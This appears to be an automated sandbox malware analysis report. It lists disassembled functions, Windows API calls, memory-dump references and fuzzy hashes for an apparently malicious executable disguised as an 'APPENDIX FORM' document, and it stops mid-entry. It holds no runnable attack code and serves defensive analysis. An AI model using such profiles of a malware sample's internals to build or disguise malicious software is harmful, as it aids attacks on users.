                                                                                                              Function 333E7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 333E715C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 333E717F
                                                                                                                • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 333E71A5
                                                                                                              • _free.LIBCMT ref: 333E71B8
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 333E71C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 336800556-0
                                                                                                              • Opcode ID: 5f7a7b923c13d7882d66459c5066d05448565fb10ffe1b1db560fb2453f5ac1e
                                                                                                              • Instruction ID: 246856552f7542b9da37654819fc79fabb2da61f6ce20fc161b4bd0d05502c24
                                                                                                              • Opcode Fuzzy Hash: 5f7a7b923c13d7882d66459c5066d05448565fb10ffe1b1db560fb2453f5ac1e
                                                                                                              • Instruction Fuzzy Hash: 2501ACBBA11335BFA7111EB65C8CD7B6A6DDFC39A1358812DBD04D7200DE758C0282B1
                                                                                                              Function 00402A3F Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A60
                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AA5
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402ACA
                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                                                              • Instruction ID: a214132de7a877a1f887ec7b259b79ce535b7ac4ce934fbe7a8c52476c4c5b6f
                                                                                                              • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                                                              • Instruction Fuzzy Hash: A8116D71A00108BFDF219F90DE49EAB7B79EB54349F104176F906A00A0D7B49E51AF59
                                                                                                              Function 333E5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,333E636D,333E5713,00000000,?,333E2249,?,?,333E1D66,00000000,?,?,00000000), ref: 333E5B7F
                                                                                                              • _free.LIBCMT ref: 333E5BB4
                                                                                                              • _free.LIBCMT ref: 333E5BDB
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E5BE8
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E5BF1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: 500f5002824ad591ebbb2567ab02a2e6abd6f9c03886a8bff95932e4597d66f3
                                                                                                              • Instruction ID: 0c2fea4cd49c50001cf6b8510dc17f10db4cf8cf8ca128c7e16acafca59bb5af
                                                                                                              • Opcode Fuzzy Hash: 500f5002824ad591ebbb2567ab02a2e6abd6f9c03886a8bff95932e4597d66f3
                                                                                                              • Instruction Fuzzy Hash: 9D01443B984723ABF2023E349CC0E1B2BAD8FC25B0358C024F816F6240EE68C8020124
                                                                                                              Function 333E1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,333E10DF,?,?,?,00000000), ref: 333E1E9A
                                                                                                              • lstrcatW.KERNEL32(?,?,?,333E10DF,?,?,?,00000000), ref: 333E1EAC
                                                                                                              • lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EB3
                                                                                                              • lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EC8
                                                                                                              • lstrcatW.KERNEL32(?,333E10DF,?,333E10DF,?,?,?,00000000), ref: 333E1ED3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 493641738-0
                                                                                                              • Opcode ID: 2f8117b89d6fd83f84843ab3117c52650167529ce9e81ffa21cf096904de98da
                                                                                                              • Instruction ID: 12ae777765c2a4c256f75624263c7db062391b12904ef54421b592583bc29a25
                                                                                                              • Opcode Fuzzy Hash: 2f8117b89d6fd83f84843ab3117c52650167529ce9e81ffa21cf096904de98da
                                                                                                              • Instruction Fuzzy Hash: 19F0E927540220BED2213B29EC85F7FB77CEFC6B61F088019F508931909B545C4383B5
                                                                                                              Function 333E91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E91D0
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E91E2
                                                                                                              • _free.LIBCMT ref: 333E91F4
                                                                                                              • _free.LIBCMT ref: 333E9206
                                                                                                              • _free.LIBCMT ref: 333E9218
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: dd88697c920ef447ca81824e1b9d646cadc334f63d64c7959382f1bbc6970d08
                                                                                                              • Instruction ID: 4d3ac6769347535243adef3f978d837c9d40a60b52531de5ca5d0d69dae2d092
                                                                                                              • Opcode Fuzzy Hash: dd88697c920ef447ca81824e1b9d646cadc334f63d64c7959382f1bbc6970d08
                                                                                                              • Instruction Fuzzy Hash: 72F04FF79542649BC610EE55DAC4C467BDDEE012613948805F849E7900CB24F8908B51
                                                                                                              Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: 798701f16da20f5a9e2b46831d7ac0bda42790efec9a428182bd8af3c6c43b67
                                                                                                              • Instruction ID: 71b2249b13ff86d947a8851956aed69ca37d5691e0091abe6cfe68cca6ac1506
                                                                                                              • Opcode Fuzzy Hash: 798701f16da20f5a9e2b46831d7ac0bda42790efec9a428182bd8af3c6c43b67
                                                                                                              • Instruction Fuzzy Hash: 3EF04FB2A04104BFE701EBA4DE88CAF77BCEB44301B004576F501F2091C7389D028B79
                                                                                                              Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D29
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                              • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: 5c27eccda21d509614222abf476d894bce3862bc08e220fe33f854b522b1654c
                                                                                                              • Instruction ID: 5399a24e5cdce0b27410f2cdff9dfddad5b6d8cdd0e7a6f2869d00f867cec74d
                                                                                                              • Opcode Fuzzy Hash: 5c27eccda21d509614222abf476d894bce3862bc08e220fe33f854b522b1654c
                                                                                                              • Instruction Fuzzy Hash: C0016271968340AFEB015BB0AE4AB9A3FB4E715705F108479F541B72E2C57844159B2B
                                                                                                              Function 333E5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E536F
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E5381
                                                                                                              • _free.LIBCMT ref: 333E5394
                                                                                                              • _free.LIBCMT ref: 333E53A5
                                                                                                              • _free.LIBCMT ref: 333E53B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 4c9333845f4cb11624160b3db1569ce853a9a7e90b3bb54c5dcf58124d83cf02
                                                                                                              • Instruction ID: b7b3373480c4a5e8fb01e05f61fc3d6dcc1692032ef4ab32e378b98223638d85
                                                                                                              • Opcode Fuzzy Hash: 4c9333845f4cb11624160b3db1569ce853a9a7e90b3bb54c5dcf58124d83cf02
                                                                                                              • Instruction Fuzzy Hash: F7F0DA76C18335DBD6427F25DA804193BF9FB1A6B0385C20AF814B7350DB3184A3AF82
                                                                                                              Function 333E4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,00000104), ref: 333E4C1D
                                                                                                              • _free.LIBCMT ref: 333E4CE8
                                                                                                              • _free.LIBCMT ref: 333E4CF2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$FileModuleName
                                                                                                              • String ID: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                              • API String ID: 2506810119-1533645698
                                                                                                              • Opcode ID: ebbe44a6b8a4b3caf6892df4f80af0774d6b03ddaf0712fd1508139d2f528b05
                                                                                                              • Instruction ID: 149ce61e31eac664a7baeea03770b9926d736e30c10e7b50947384642b5dd2f1
                                                                                                              • Opcode Fuzzy Hash: ebbe44a6b8a4b3caf6892df4f80af0774d6b03ddaf0712fd1508139d2f528b05
                                                                                                              • Instruction Fuzzy Hash: A5316DB6E40338BFDB11DF99CDC099EBBFCEB89360B54C166E804A7600D6719A81CB51
                                                                                                              Function 004047B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(0041FCE0,0041FCE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D4,000000DF,0000040F,00000400,00000000), ref: 00404842
                                                                                                              • wsprintfA.USER32 ref: 0040484A
                                                                                                              • SetDlgItemTextA.USER32(?,0041FCE0), ref: 0040485D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s
                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                              • Opcode ID: 7e3112763402f489b88aa5e8dbe094a712e2dffb0b9a7abcdadb0f5c3fedc2af
                                                                                                              • Instruction ID: 6f1176408ced8b99102d6b0dd6b5492669b9c19e2170e44431a7d9c2d4d564a9
                                                                                                              • Opcode Fuzzy Hash: 7e3112763402f489b88aa5e8dbe094a712e2dffb0b9a7abcdadb0f5c3fedc2af
                                                                                                              • Instruction Fuzzy Hash: B011E2776001243BDB00626D9C4AFEF3699DBC6374F15823BFA25B71D1EA788C5182E9
                                                                                                              Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
                                                                                                              • Instruction ID: 32dbfdbc90181073e3716ad927fe4118a64655002d51add2ca0d79efa18d1667
                                                                                                              • Opcode Fuzzy Hash: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
                                                                                                              • Instruction Fuzzy Hash: B02181B1A44208BEEF45AFB4CD4AAAE7AB5EB40304F14457AF541B61D1D6B88940DB18
                                                                                                              Function 333E86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,333E6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 333E8731
                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 333E87BA
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 333E87CC
                                                                                                              • __freea.LIBCMT ref: 333E87D5
                                                                                                                • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 2652629310-0
                                                                                                              • Opcode ID: 94eadfda095ee133db1e69f8209f11a32f2aabd950a80b3d6eb3e157a1b2c965
                                                                                                              • Instruction ID: 509b114f396ca54601694e32b37e89ac7eac572193d7ecc5d73cdcc1cceddcac
                                                                                                              • Opcode Fuzzy Hash: 94eadfda095ee133db1e69f8209f11a32f2aabd950a80b3d6eb3e157a1b2c965
                                                                                                              • Instruction Fuzzy Hash: 5F31CE77E0022AABDF149F64CC80EAF3BA9EF41715F058128FC04DA290E735C991DB90
                                                                                                              Function 0040303C Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00403051
                                                                                                                • Part of subcall function 004031CE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD,000000FF,00000000,00000000), ref: 00403084
                                                                                                              • WriteFile.KERNEL32(0040A888,?,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?), ref: 0040313E
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00412888,00004000,?,00000000,?,00402F54,00000004,00000000,00000000,?,?,?,00402ECD), ref: 00403190
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$CountTickWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 2146148272-0
                                                                                                              • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction ID: a35b4d635d582a079554899d3f3348b8a37966e1b02de07338691533ba46218a
                                                                                                              • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                                                              • Instruction Fuzzy Hash: 8B41BF729042019FDB10AF29ED849663FFCE748356715823BE914BB2E0C7399E41DB5E
                                                                                                              Function 0040231E Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235C
                                                                                                              • lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237C
                                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B5
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1356686001-0
                                                                                                              • Opcode ID: 5d4bc013e145d610d8e4d3776898919e2ad1293bc549356cb0d91ef786ee7921
                                                                                                              • Instruction ID: 5b7358e468b3e7e805740e69444adcde94b22edecb5190afa3496e3dc7040632
                                                                                                              • Opcode Fuzzy Hash: 5d4bc013e145d610d8e4d3776898919e2ad1293bc549356cb0d91ef786ee7921
                                                                                                              • Instruction Fuzzy Hash: AD1181B1A00118BEEB10EBA4DE89EAF7678EB50358F10413AF905B61D1D6B85D01A628
                                                                                                              Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(?,?,004210E8,?,00405875,004210E8,004210E8,0042A400,?,771B2EE0,004055C0,?,0042A400,771B2EE0,00000000), ref: 00405817
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
                                                                                                              • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,000000F0), ref: 00401622
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3751793516-0
                                                                                                              • Opcode ID: a5e224c393a2dbf3682a9a167fecb91690cdd684f6bc615aac3eb61a4f6a471a
                                                                                                              • Instruction ID: a7fcd4b568d892c9356fe073e55a2dcd02e69eb8fb6dd9dcb191d2df0a387b75
